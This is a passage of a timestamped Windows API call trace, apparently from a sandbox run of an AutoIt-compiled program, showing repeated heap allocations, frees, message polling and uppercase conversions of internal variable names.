hHeap=0xb80000) returned 1 [0265.925] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee10 [0265.925] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0265.925] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9ee10 | out: hHeap=0xb80000) returned 1 [0265.925] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: hHeap=0xb80000) returned 1 [0265.925] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee10 [0265.925] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0265.925] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9ee10 | out: hHeap=0xb80000) returned 1 [0265.925] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: hHeap=0xb80000) returned 1 [0265.925] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89c70 [0265.925] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0265.925] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89c70 | out: hHeap=0xb80000) returned 1 [0265.925] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: hHeap=0xb80000) returned 1 [0265.925] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99388 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99340 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.926] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.926] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89c70 [0265.926] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99310 [0265.926] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d00 [0265.926] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99310 | out: hHeap=0xb80000) returned 1 [0265.926] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89c98 [0265.926] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99310 [0265.926] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99250 [0265.926] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.926] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d10 [0265.926] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99250 | out: hHeap=0xb80000) returned 1 [0265.926] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d10 | out: hHeap=0xb80000) returned 1 [0265.926] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89cc0 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99250 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d10 [0265.927] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99250 | out: hHeap=0xb80000) returned 1 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89ce8 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99250 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99238 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d20 [0265.927] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99238 | out: hHeap=0xb80000) returned 1 [0265.927] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d20 | out: hHeap=0xb80000) returned 1 [0265.927] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89d10 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99238 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d20 [0265.927] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99238 | out: hHeap=0xb80000) returned 1 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89d38 [0265.927] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99238 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993b8 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d30 [0265.928] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc993b8 | out: hHeap=0xb80000) returned 1 [0265.928] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d30 | out: hHeap=0xb80000) returned 1 [0265.928] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89d60 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993b8 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d30 [0265.928] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc993b8 | out: hHeap=0xb80000) returned 1 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89d88 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993b8 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993d0 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d40 [0265.928] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc993d0 | out: hHeap=0xb80000) returned 1 [0265.928] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d40 | out: hHeap=0xb80000) returned 1 [0265.928] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89db0 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993d0 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d40 [0265.928] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc993d0 | out: hHeap=0xb80000) returned 1 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee10 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993d0 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993e8 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d50 [0265.928] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc993e8 | out: hHeap=0xb80000) returned 1 [0265.928] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993e8 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d60 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc993e8 | out: hHeap=0xb80000) returned 1 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d60 | out: hHeap=0xb80000) returned 1 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89dd8 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993e8 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d60 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d60 | out: hHeap=0xb80000) returned 1 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99400 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d60 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d60 | out: hHeap=0xb80000) returned 1 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc993e8 | out: hHeap=0xb80000) returned 1 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99400 | out: hHeap=0xb80000) returned 1 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89dd8 | out: hHeap=0xb80000) returned 1 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d50 | out: hHeap=0xb80000) returned 1 [0265.929] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89dd8 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99400 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d50 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99400 | out: hHeap=0xb80000) returned 1 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89e00 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99400 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993e8 [0265.929] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d60 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc993e8 | out: hHeap=0xb80000) returned 1 [0265.929] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d60 | out: hHeap=0xb80000) returned 1 [0265.929] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89e28 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993e8 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d60 [0265.930] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc993e8 | out: hHeap=0xb80000) returned 1 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ed68 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc993e8 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99418 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d70 [0265.930] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99418 | out: hHeap=0xb80000) returned 1 [0265.930] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d70 | out: hHeap=0xb80000) returned 1 [0265.930] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89e50 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99418 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d70 [0265.930] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99418 | out: hHeap=0xb80000) returned 1 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee48 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99418 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99430 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d80 [0265.930] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99430 | out: hHeap=0xb80000) returned 1 [0265.930] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d80 | out: hHeap=0xb80000) returned 1 [0265.930] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89e78 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99430 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d80 [0265.930] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99430 | out: hHeap=0xb80000) returned 1 [0265.930] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee80 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99430 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99448 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95d90 [0265.931] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99448 | out: hHeap=0xb80000) returned 1 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89ea0 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99448 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95da0 [0265.931] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95da0 | out: hHeap=0xb80000) returned 1 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99460 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95da0 [0265.931] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95da0 | out: hHeap=0xb80000) returned 1 [0265.931] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99448 | out: hHeap=0xb80000) returned 1 [0265.931] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99460 | out: hHeap=0xb80000) returned 1 [0265.931] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89ea0 | out: hHeap=0xb80000) returned 1 [0265.931] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95d90 | out: hHeap=0xb80000) returned 1 [0265.931] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89ea0 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99460 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95d90 [0265.931] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99460 | out: hHeap=0xb80000) returned 1 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89ec8 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99460 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99448 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95da0 [0265.931] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99448 | out: hHeap=0xb80000) returned 1 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89ef0 [0265.931] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99448 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95db0 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95db0 | out: hHeap=0xb80000) returned 1 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99478 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95db0 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95db0 | out: hHeap=0xb80000) returned 1 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99490 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95db0 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95db0 | out: hHeap=0xb80000) returned 1 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99448 | out: hHeap=0xb80000) returned 1 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99478 | out: hHeap=0xb80000) returned 1 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99490 | out: hHeap=0xb80000) returned 1 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89ef0 | out: hHeap=0xb80000) returned 1 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95da0 | out: hHeap=0xb80000) returned 1 [0265.932] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89ef0 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99490 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95da0 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99490 | out: hHeap=0xb80000) returned 1 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89f18 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99490 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99478 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95db0 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99478 | out: hHeap=0xb80000) returned 1 [0265.932] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95db0 | out: hHeap=0xb80000) returned 1 [0265.932] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89f40 [0265.932] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99478 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95db0 [0265.933] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99478 | out: hHeap=0xb80000) returned 1 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89f68 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99478 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99448 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95dc0 [0265.933] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99448 | out: hHeap=0xb80000) returned 1 [0265.933] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95dc0 | out: hHeap=0xb80000) returned 1 [0265.933] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89f90 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99448 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95dc0 [0265.933] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99448 | out: hHeap=0xb80000) returned 1 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89fb8 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99448 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994a8 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95dd0 [0265.933] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc994a8 | out: hHeap=0xb80000) returned 1 [0265.933] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95dd0 | out: hHeap=0xb80000) returned 1 [0265.933] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89fe0 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994a8 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95dd0 [0265.933] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc994a8 | out: hHeap=0xb80000) returned 1 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a008 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994a8 [0265.933] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994c0 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95de0 [0265.934] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc994c0 | out: hHeap=0xb80000) returned 1 [0265.934] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95de0 | out: hHeap=0xb80000) returned 1 [0265.934] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a030 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994c0 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95de0 [0265.934] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc994c0 | out: hHeap=0xb80000) returned 1 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9eeb8 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994c0 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994d8 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95df0 [0265.934] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc994d8 | out: hHeap=0xb80000) returned 1 [0265.934] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95df0 | out: hHeap=0xb80000) returned 1 [0265.934] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a058 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994d8 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95df0 [0265.934] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc994d8 | out: hHeap=0xb80000) returned 1 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9eef0 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994d8 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994f0 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95e00 [0265.934] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc994f0 | out: hHeap=0xb80000) returned 1 [0265.934] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95e00 | out: hHeap=0xb80000) returned 1 [0265.934] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.934] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a080 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994f0 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, 